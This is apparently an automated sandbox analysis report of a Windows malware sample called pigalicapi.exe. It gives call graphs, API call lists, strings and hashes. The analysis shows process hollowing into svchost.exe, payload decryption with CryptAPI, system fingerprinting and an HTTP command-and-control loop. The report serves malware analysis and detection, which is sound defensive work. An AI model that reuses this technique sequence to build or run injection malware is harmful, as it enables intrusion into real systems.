10788->10789 10789->10788 10790->10675 10828 568b06 10791->10828 10794 568bf3 10795 568bff _abort 10794->10795 10799 568c2c _abort 10795->10799 10802 568c26 _abort 10795->10802 10842 566a68 GetLastError 10795->10842 10797 568c78 10798 5662bc _free 20 API calls 10797->10798 10800 568c5b _abort 10798->10800 10805 568ca4 10799->10805 10861 567c63 EnterCriticalSection 10799->10861 10870 56a5c9 10800->10870 10802->10797 10802->10799 10802->10800 10806 568d03 10805->10806 10808 568cfb 10805->10808 10816 568d2e 10805->10816 10862 567cab LeaveCriticalSection 10805->10862 10806->10816 10863 568bea 10806->10863 10811 568a48 _abort 28 API calls 10808->10811 10811->10806 10813 5669e4 _abort 35 API calls 10817 568d91 10813->10817 10815 568bea _abort 35 API calls 10815->10816 10866 568db3 10816->10866 10817->10800 10818 5669e4 _abort 35 API calls 10817->10818 10818->10800 10820 566481 _abort ___scrt_fastfail 10819->10820 10821 5664ad IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10820->10821 10824 56657e _abort 10821->10824 10822 56a183 _ValidateLocalCookies 5 API calls 10823 56659c 10822->10823 10823->10600 10824->10822 10874 568857 10825->10874 10831 568aac 10828->10831 10830 567321 10830->10597 10830->10794 10832 568ab8 ___scrt_is_nonwritable_in_current_image 10831->10832 10837 567c63 EnterCriticalSection 10832->10837 10834 568ac6 10838 568afa 10834->10838 10836 568aed ___scrt_is_nonwritable_in_current_image 10836->10830 10837->10834 10841 567cab LeaveCriticalSection 10838->10841 10840 568b04 10840->10836 10841->10840 10843 566a81 10842->10843 10844 566a87 10842->10844 10845 5675b9 _free 11 API calls 10843->10845 10846 56735f _free 17 API calls 10844->10846 10848 566ade SetLastError 10844->10848 10845->10844 10847 566a99 10846->10847 10849 566aa1 10847->10849 10850 56760f _free 11 API calls 10847->10850 10851 566ae7 10848->10851 10853 5673bc _free 17 API calls 10849->10853 10852 566ab6 10850->10852 10851->10802 10852->10849 10854 566abd 10852->10854 10855 566aa7 10853->10855 10856 566856 _free 17 API calls 10854->10856 10857 566ad5 SetLastError 10855->10857 10858 566ac8 10856->10858 10857->10851 10859 5673bc _free 17 API calls 10858->10859 10860 566ace 10859->10860 10860->10848 10860->10857 10861->10805 10862->10808 10864 5669e4 _abort 35 API calls 10863->10864 10865 568bef 10864->10865 10865->10815 10867 568d82 10866->10867 10868 568db9 10866->10868 10867->10800 10867->10813 10867->10817 10873 567cab LeaveCriticalSection 10868->10873 10871 56a183 _ValidateLocalCookies 5 API calls 10870->10871 10872 56a5d4 10871->10872 10872->10872 10873->10867 10875 568863 _abort 10874->10875 10884 56887b 10875->10884 10896 56a486 GetModuleHandleW 10875->10896 10882 568883 10883 5688f8 10882->10883 10893 568921 10882->10893 10906 569baf 10882->10906 10887 568910 10883->10887 10909 5697a5 10883->10909 10905 567c63 EnterCriticalSection 10884->10905 10885 56893e 10916 568970 10885->10916 10886 56896a 10891 56a5c9 _abort 5 API calls 10886->10891 10888 5697a5 _abort 5 API calls 10887->10888 10888->10893 10895 56735e 10891->10895 10913 568961 10893->10913 10897 56886f 10896->10897 10897->10884 10898 5689b1 GetModuleHandleExW 10897->10898 10899 5689db GetProcAddress 10898->10899 10900 5689f0 10898->10900 10899->10900 10901 568a04 FreeLibrary 10900->10901 10902 568a0d 10900->10902 10901->10902 10903 56a183 _ValidateLocalCookies 5 API calls 10902->10903 10904 568a17 10903->10904 10904->10884 10905->10882 10924 5698e8 10906->10924 10910 5697d4 10909->10910 10911 56a183 _ValidateLocalCookies 5 API calls 10910->10911 10912 5697fd 10911->10912 10912->10887 10946 567cab LeaveCriticalSection 10913->10946 10915 56893a 10915->10885 10915->10886 10947 5677d4 10916->10947 10919 56899e 10922 5689b1 _abort 8 API calls 10919->10922 10920 56897e GetPEB 10920->10919 10921 56898e GetCurrentProcess TerminateProcess 10920->10921 10921->10919 10923 5689a6 ExitProcess 10922->10923 10927 569897 10924->10927 10926 56990c 10926->10883 10928 5698a3 ___scrt_is_nonwritable_in_current_image 10927->10928 10935 567c63 EnterCriticalSection 10928->10935 10930 5698b1 10936 569938 10930->10936 10934 5698cf ___scrt_is_nonwritable_in_current_image 10934->10926 10935->10930 10937 569958 10936->10937 10941 569960 10936->10941 10938 56a183 _ValidateLocalCookies 5 API calls 10937->10938 10939 5698be 10938->10939 10942 5698dc 10939->10942 10940 5673bc _free 20 API calls 10940->10937 10941->10937 10941->10940 10945 567cab LeaveCriticalSection 10942->10945 10944 5698e6 10944->10934 10945->10944 10946->10915 10948 5677ef 10947->10948 10949 5677f9 10947->10949 10951 56a183 _ValidateLocalCookies 5 API calls 10948->10951 10950 5673f6 _free 5 API calls 10949->10950 10950->10948 10952 567857 10951->10952 10952->10919 10952->10920 10953->10526 10957 567cab LeaveCriticalSection 10954->10957 10956 5682d5 10956->10526 10957->10956 10959 567d4a 10958->10959 10960 567d40 10958->10960 10959->10960 10961 5669e4 _abort 35 API calls 10959->10961 10960->10535 10960->10536 10962 567d6b 10961->10962 10966 569725 10962->10966 10967 567d84 10966->10967 10968 569738 10966->10968 10970 569752 10967->10970 10968->10967 10974 567b5b 10968->10974 10971 569765 10970->10971 10972 56977a 10970->10972 10971->10972 10973 56823d __fassign 35 API calls 10971->10973 10972->10960 10973->10972 10975 567b67 ___scrt_is_nonwritable_in_current_image 10974->10975 10976 5669e4 _abort 35 API calls 10975->10976 10977 567b70 10976->10977 10978 567bbe ___scrt_is_nonwritable_in_current_image 10977->10978 10986 567c63 EnterCriticalSection 10977->10986 10978->10967 10980 567b8e 10987 567bd2 10980->10987 10985 56731c _abort 35 API calls 10985->10978 10986->10980 10988 567ba2 10987->10988 10989 567be0 __fassign 10987->10989 10991 567bc1 10988->10991 10989->10988 10990 56790e __fassign 20 API calls 10989->10990 10990->10988 10994 567cab LeaveCriticalSection 10991->10994 10993 567bb5 10993->10978 10993->10985 10994->10993 10996 56806e 10995->10996 10997 567fc4 10995->10997 11000 56a183 _ValidateLocalCookies 5 API calls 10996->11000 11005 5692c1 10997->11005 11002 56811a 11000->11002 11002->10553 11004 56961b 41 API calls 11004->10996 11006 567d2d __fassign 35 API calls 11005->11006 11007 5692e1 MultiByteToWideChar 11006->11007 11009 56931f 11007->11009 11010 5693b7 11007->11010 11012 569273 __onexit 21 API calls 11009->11012 11015 569340 __alloca_probe_16 ___scrt_fastfail 11009->11015 11011 56a183 _ValidateLocalCookies 5 API calls 11010->11011 11013 568025 11011->11013 11012->11015 11019 56961b 11013->11019 11014 5693b1 11024 5693de 11014->11024 11015->11014 11017 569385 MultiByteToWideChar 11015->11017 11017->11014 11018 5693a1 GetStringTypeW 11017->11018 11018->11014 11020 567d2d __fassign 35 API calls 11019->11020 11021 56962e 11020->11021 11028 5693fe 11021->11028 11025 5693fb 11024->11025 11026 5693ea 11024->11026 11025->11010 11026->11025 11027 5673bc _free 20 API calls 11026->11027 11027->11025 11030 569419 11028->11030 11029 56943f MultiByteToWideChar 11031 5695f3 11029->11031 11032 569469 11029->11032 11030->11029 11033 56a183 _ValidateLocalCookies 5 API calls 11031->11033 11035 569273 __onexit 21 API calls 11032->11035 11038 56948a __alloca_probe_16 11032->11038 11034 568046 11033->11034 11034->11004 11035->11038 11036 5694d3 MultiByteToWideChar 11037 56953f 11036->11037 11039 5694ec 11036->11039 11041 5693de __freea 20 API calls 11037->11041 11038->11036 11038->11037 11055 5676ca 11039->11055 11041->11031 11043 569516 11043->11037 11045 5676ca 12 API calls 11043->11045 11044 56954e 11047 569273 __onexit 21 API calls 11044->11047 11050 56956f __alloca_probe_16 11044->11050 11045->11037 11046 5695e4 11049 5693de __freea 20 API calls 11046->11049 11047->11050 11048 5676ca 12 API calls 11051 5695c3 11048->11051 11049->11037 11050->11046 11050->11048 11051->11046 11052 5695d2 WideCharToMultiByte 11051->11052 11052->11046 11053 569612 11052->11053 11054 5693de __freea 20 API calls 11053->11054 11054->11037 11056 5673f6 _free 5 API calls 11055->11056 11057 5676f1 11056->11057 11058 567721 11057->11058 11059 5676fa LCMapStringEx 11057->11059 11066 567752 11058->11066 11063 567741 11059->11063 11064 56a183 _ValidateLocalCookies 5 API calls 11063->11064 11065 56774c 11064->11065 11065->11037 11065->11043 11065->11044 11067 5673f6 _free 5 API calls 11066->11067 11068 567779 11067->11068 11069 56a183 _ValidateLocalCookies 5 API calls 11068->11069 11070 56773a LCMapStringW 11069->11070 11070->11063 11072 567cce ___scrt_is_nonwritable_in_current_image 11071->11072 11079 567c63 EnterCriticalSection 11072->11079 11074 567cd8 11080 567db0 11074->11080 11078 567cf1 ___scrt_is_nonwritable_in_current_image 11078->10567 11079->11074 11092 5684d0 11080->11092 11082 567dfe 11083 5684d0 20 API calls 11082->11083 11084 567e1a 11083->11084 11085 5684d0 20 API calls 11084->11085 11086 567e38 11085->11086 11087 5673bc _free 20 API calls 11086->11087 11088 567ce5 11086->11088 11087->11088 11089 567cf9 11088->11089 11102 567cab LeaveCriticalSection 11089->11102 11091 567d03 11091->11078 11093 5684e1 11092->11093 11101 5684dd _abort 11092->11101 11094 5684e8 11093->11094 11096 5684fb ___scrt_fastfail 11093->11096 11095 5662bc _free 20 API calls 11094->11095 11095->11101 11097 568532 11096->11097 11098 568529 11096->11098 11096->11101 11100 5662bc _free 20 API calls 11097->11100 11097->11101 11099 5662bc _free 20 API calls 11098->11099 11099->11101 11100->11101 11101->11082 11102->11091 12293 56be2f 12302 56c803 GetEnvironmentStringsW 12293->12302 12297 5673bc _free 20 API calls 12298 56be7c 12297->12298 12299 5673bc _free 20 API calls 12301 56be47 12299->12301 12300 56be52 12300->12299 12301->12297 12303 56c817 12302->12303 12304 56be41 12302->12304 12305 569273 __onexit 21 API calls 12303->12305 12304->12301 12309 56be82 12304->12309 12306 56c82b 12305->12306 12307 5673bc _free 20 API calls 12306->12307 12308 56c845 FreeEnvironmentStringsW 12307->12308 12308->12304 12310 56bea0 12309->12310 12311 56735f _free 20 API calls 12310->12311 12321 56beda 12311->12321 12312 56bf4b 12313 5673bc _free 20 API calls 12312->12313 12314 56bf65 12313->12314 12314->12300 12315 56735f _free 20 API calls 12315->12321 12316 56bf4d 12333 56bf7c 12316->12333 12320 56bf6f 12339 56663f IsProcessorFeaturePresent 12320->12339 12321->12312 12321->12315 12321->12316 12321->12320 12324 5673bc _free 20 API calls 12321->12324 12326 569c69 12321->12326 12322 5673bc _free 20 API calls 12322->12312 12324->12321 12325 56bf7b 12327 569c76 12326->12327 12328 569c84 12326->12328 12327->12328 12330 569c9d 12327->12330 12329 5662bc _free 20 API calls 12328->12329 12331 569c8e _abort 12329->12331 12330->12331 12332 5662bc _free 20 API calls 12330->12332 12331->12321 12332->12331 12334 56bf53 12333->12334 12335 56bf89 12333->12335 12334->12322 12336 56bfa0 12335->12336 12337 5673bc _free 20 API calls 12335->12337 12338 5673bc _free 20 API calls 12336->12338 12337->12335 12338->12334 12340 56664a 12339->12340 12341 566465 _abort 8 API calls 12340->12341 12342 56665f GetCurrentProcess TerminateProcess 12341->12342 12342->12325

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 a14ba0-a14bbc CoInitialize 1 a156f0-a156fc CoUninitialize 0->1 2 a14bc2-a14bff call a17b70 SetEvent 0->2 2->1 6 a14c05-a14c0e 2->6 7 a14c10-a14c21 WaitForSingleObject 6->7 8 a14c28-a14c84 VirtualAlloc * 3 6->8 7->8 9 a14c23 7->9 10 a156eb 8->10 11 a14c8a-a14c8e 8->11 9->1 10->1 11->10 12 a14c94-a14c98 11->12 12->10 13 a14c9e-a14cbd 12->13 15 a14cc3-a14cd0 13->15 16 a152a2-a152b2 13->16 17 a14cd6-a14ce3 15->17 18 a1529d 15->18 19 a15325-a1534e call a18370 16->19 20 a152b4-a152be 16->20 21 a14ce5-a14d17 call a16170 * 2 call a160c0 17->21 22 a14d1c-a14d29 17->22 30 a15354-a1537f lstrlenA * 2 19->30 31 a156b8-a156e5 VirtualFree * 3 19->31 20->19 23 a152c0-a152d1 20->23 21->18 25 a14d62-a14d6f 22->25 26 a14d2b-a14d5d call a16170 * 2 call a160c0 22->26 23->19 28 a152d3-a152dd 23->28 35 a14d71-a14da3 call a16170 * 2 call a160c0 25->35 36 a14da8-a14db5 25->36 26->18 28->19 34 a152df-a15322 call a17b70 28->34 30->31 37 a15385-a153ca wsprintfA CryptBinaryToStringA 30->37 31->10 34->19 35->18 38 a14db7-a14dd8 GetCurrentThreadId call a16170 36->38 39 a14e2c-a14e39 36->39 37->31 44 a153d0-a1544e MultiByteToWideChar call a117d0 37->44 65 a14dda-a14dfb call a16170 call a160c0 38->65 66 a14dfd-a14e04 38->66 45 a14e72-a14e7f 39->45 46 a14e3b-a14e6d call a16170 * 2 call a160c0 39->46 71 a15454-a1545e 44->71 72 a1569b-a156a2 44->72 58 a14ee1-a14eee 45->58 59 a14e81-a14eb4 GetSystemMetrics * 2 call a16170 45->59 46->18 62 a14f40-a14f4d 58->62 63 a14ef0-a14f13 GlobalMemoryStatus call a16170 58->63 81 a14eb9-a14edc call a16170 call a160c0 59->81 77 a14f86-a14f93 62->77 78 a14f4f-a14f81 call a16170 * 2 call a160c0 62->78 89 a14f18-a14f3b call a16170 call a160c0 63->89 79 a14e27 65->79 66->79 80 a14e06-a14e24 call a16170 call a160c0 66->80 87 a15470-a15477 71->87 88 a15460-a1546a 71->88 72->31 84 a156a4-a156b2 VirtualFree 72->84 85 a14fd0-a14fdd 77->85 86 a14f95-a14fcb call a16170 * 2 call a160c0 77->86 78->18 79->18 80->79 81->18 84->31 102 a15032-a1503f 85->102 103 a14fdf-a1502d lstrlenA call a16170 * 2 call a160c0 85->103 86->18 97 a1551f-a15526 87->97 98 a1547d-a154af VirtualFree 87->98 88->87 88->97 89->18 97->72 108 a1552c-a15540 EnterCriticalSection 97->108 112 a154c0-a154c7 98->112 109 a15041-a15091 lstrlenA call a16170 * 2 call a160c0 102->109 110 a15096-a150a3 102->110 103->18 120 a15542-a15573 VirtualAlloc call a17b70 108->120 121 a1558c-a155c1 VirtualAlloc 108->121 109->18 126 a150a5-a150ff lstrlenA call a16170 * 2 call a160c0 110->126 127 a15104-a15111 110->127 112->97 125 a154c9-a154f5 call a117d0 112->125 143 a15578-a15587 120->143 134 a155c7-a155d8 GetTickCount 121->134 135 a1568e-a15695 LeaveCriticalSection 121->135 151 a154fa-a1550d 125->151 126->18 132 a15113-a1516d lstrlenA call a16170 * 2 call a160c0 127->132 133 a15172-a1517f 127->133 132->18 149 a15181-a151db lstrlenA call a16170 * 2 call a160c0 133->149 150 a151e0-a151ed 133->150 145 a155da-a1561a call a17b70 * 2 134->145 146 a1561c-a15659 call a17b70 * 2 134->146 135->72 143->135 192 a1565c-a1568b VirtualFree 145->192 146->192 149->18 155 a1523f-a1524c 150->155 156 a151ef-a1523d lstrlenA call a16170 * 2 call a160c0 150->156 163 a1551b 151->163 164 a1550f-a15519 151->164 155->18 171 a1524e-a1529a call a19b90 call a16170 * 2 call a160c0 155->171 156->18 163->97 164->163 174 a1551d 164->174 171->18 174->112 192->135
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00A14BAC
                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 00A14BDB
                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(0000EA60,0000000A), ref: 00A14C19
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00A14C49
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00A14C60
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 00A14C77
                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00A156F0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual$EventInitializeObjectSingleUninitializeWait
                                                                                                                                                                                                                                                          • String ID: $`$http://www.%s$pigalicapi
                                                                                                                                                                                                                                                          • API String ID: 1834614700-967124566
                                                                                                                                                                                                                                                          • Opcode ID: 2dda3b5480718fdcb680ec2e1b0f84b1a85dabf99f62ba3debde6bb672a11bbb
                                                                                                                                                                                                                                                          • Instruction ID: 51587ad174253ed84e704c53d0a256c4c5afa4cc6b78875d79555b0878a72abc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dda3b5480718fdcb680ec2e1b0f84b1a85dabf99f62ba3debde6bb672a11bbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A162B1B5D00218EFDB14DBA4DC85FEDB779BF49305F088199F605AB282E7709A85CB60
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00A120D4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,\system32\svchost.exe), ref: 00A120E6
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00A1C38C), ref: 00A120FE
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000), ref: 00A1210F
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00A12187
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00A121C0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A121D5
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00A121FE
                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(?,00000000,?,00103000,00000040), ref: 00A12227
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00A12245
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00A12252
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00A1225F
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A12270
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$Alloclstrcat$CloseFreeHandleProcess$CreateEnvironmentTerminateVariable
                                                                                                                                                                                                                                                          • String ID: D$SystemRoot$\system32\svchost.exe
                                                                                                                                                                                                                                                          • API String ID: 1819736980-1559310322
                                                                                                                                                                                                                                                          • Opcode ID: 35847bc5897d82d1f8c575ee3f28a29efdc7c2aa87cc0523c95d837ffb7d8e9a
                                                                                                                                                                                                                                                          • Instruction ID: ab4684fe3c990c967524dbca82c9cf472e8a92e58016e23588628d6312eb4693
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35847bc5897d82d1f8c575ee3f28a29efdc7c2aa87cc0523c95d837ffb7d8e9a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0D14EB5A40219EBCB28CF94DC95FEEB779FB48304F048598F609AB281D6749A81CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 536 a147f0-a14801 537 a14807-a1480e 536->537 538 a14aab-a14ab1 536->538 537->538 539 a14814-a14832 CryptAcquireContextA 537->539 540 a14834-a1483f GetLastError 539->540 541 a14856-a1485a 539->541 540->541 542 a14841-a14850 CryptAcquireContextA 540->542 541->538 543 a14860-a1489d 541->543 542->541 545 a148a3-a148f3 call a17b70 CryptCreateHash 543->545 546 a14a9f-a14aa5 CryptReleaseContext 543->546 549 a14a90-a14a96 545->549 550 a148f9-a14913 CryptHashData 545->550 546->538 551 a14a98 549->551 552 a14a9a 549->552 553 a14a83-a14a8a CryptDestroyHash 550->553 554 a14919-a14944 CryptDeriveKey 550->554 551->546 552->546 553->549 554->553 555 a1494a-a1498f CryptDecrypt CryptDestroyKey 554->555 555->553 556 a14995-a149b1 CryptCreateHash 555->556 556->553 557 a149b7-a149d4 CryptHashData 556->557 558 a14a76-a14a7d CryptDestroyHash 557->558 559 a149da-a14a0f CryptGetHashParam 557->559 558->553 559->558 560 a14a11-a14a3c CryptGetHashParam 559->560 560->558 561 a14a3e-a14a58 call a17c70 560->561 561->558 564 a14a5a-a14a72 call a17b70 561->564 564->558
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00A1482A
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A14834
                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00A14850
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00A148EB
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 00A1490B
                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 00A1493C
                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 00A1496F
                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 00A14982
                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 00A149A9
                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 00A149CC
                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 00A14A07
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A14845
                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00A1481F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_a10000_pigalicapi.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$AcquireContextCreateData$DecryptDeriveDestroyErrorLastParam
                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                          • API String ID: 2739279601-947817771
                                                                                                                                                                                                                                                          • Opcode ID: 48a6c88517aa8c8c40505f9bb02b8893de5d7724f4da16f5903f08d3305e3de5
                                                                                                                                                                                                                                                          • Instruction ID: dd65c37d389c3e3bac22a77a13cd94e41888ebc8350eabeccae919749bc367c3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48a6c88517aa8c8c40505f9bb02b8893de5d7724f4da16f5903f08d3305e3de5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5713E71A80318ABDB25CBA4CC45BED777CAB4CB50F008598F609AA1C0DBB59BC4CF54
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 626 a13b00-a13b5c call a11000 call a13130 call a12ed0 GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize call a14510 635 a13b62-a13c8c call a17d20 call a15700 call a15a00 call a17d20 call a19400 call a199f0 call a16060 call a15e00 StrStrIA call a11120 call a15e30 call a16cf0 call a15f30 call a19b90 WSAStartup 626->635 636 a1400a-a1400c ExitProcess 626->636 635->636 663 a13c92-a13cb1 635->663 664 a13cc0-a13cc9 663->664 665 a13cb3-a13cbb 663->665 666 a13ccb-a13cd4 664->666 667 a13cda-a13ce3 664->667 665->664 666->667 668 a13ce5-a13cee 667->668 669 a13cf4-a13cfd 667->669 668->669 670 a13d0c-a13d15 669->670 671 a13cff-a13d07 669->671 672 a13d17-a13d20 670->672 673 a13d26-a13d2f 670->673 671->670 672->673 674 a13d31-a13d3a 673->674 675 a13d40-a13dfd call a17d20 call a1a700 call a1a4b0 call a15b50 call a18a70 673->675 674->675 686 a13e49 675->686 687 a13dff-a13e3f call a17d20 call a178d0 675->687 689 a13e53-a13eab call a17970 call a14020 686->689 687->686 697 a13eb1-a13ed9 call a14020 689->697 698 a13f8a 689->698 706 a13f81 697->706 707 a13edf-a13efa call a14020 697->707 700 a13f91-a13f9a 698->700 702 a13fed-a13ffa Sleep 700->702 703 a13f9c-a13fa3 700->703 702->636 702->689 704 a13fd0-a13fd7 703->704 705 a13fa5-a13fac 703->705 704->702 710 a13fd9-a13fe3 704->710 708 a13fc4 705->708 709 a13fae-a13fc2 705->709 711 a13f88 706->711 714 a13eff-a13f07 707->714 713 a13fce 708->713 709->713 710->702 711->700 713->702 715 a13f09-a13f50 call a142e0 call a14020 714->715 716 a13f78 714->716 722 a13f52 715->722 723 a13f59-a13f60 715->723 718 a13f7f 716->718 718->711 722->723 724 a13f62-a13f70 VirtualFree 723->724 725 a13f76 723->725 724->725 725->718
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 00A13B2D
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00A15DB0), ref: 00A13B38
                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00A13B40
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 00A1456C
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A1458B
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: GetFileSize.KERNEL32(000000FF,00000000), ref: 00A145AD
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00A145D6
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 00A14617
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00A1463E
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A147C0
                                                                                                                                                                                                                                                            • Part of subcall function 00A14510: CloseHandle.KERNEL32(00000000), ref: 00A147E0
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00A1400C
                                                                                                                                                                                                                                                            • Part of subcall function 00A15700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 00A15742
                                                                                                                                                                                                                                                            • Part of subcall function 00A15700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 00A157B8
                                                                                                                                                                                                                                                            • Part of subcall function 00A15700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 00A157F1
                                                                                                                                                                                                                                                            • Part of subcall function 00A15700: wnsprintfA.SHLWAPI ref: 00A1582F
                                                                                                                                                                                                                                                            • Part of subcall function 00A15700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A15854
                                                                                                                                                                                                                                                            • Part of subcall function 00A15700: GetFileSize.KERNEL32(000000FF,00000000), ref: 00A1586D
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrcpyA.KERNEL32(Gyifczkhyzuai,WDefault), ref: 00A15A47
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrlenA.KERNEL32(00A1C4E0), ref: 00A15A7D
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrcpyA.KERNEL32(00000000,00A1C4E0), ref: 00A15A97
                                                                                                                                                                                                                                                            • Part of subcall function 00A15A00: lstrlenA.KERNEL32(00000000), ref: 00A15AA1
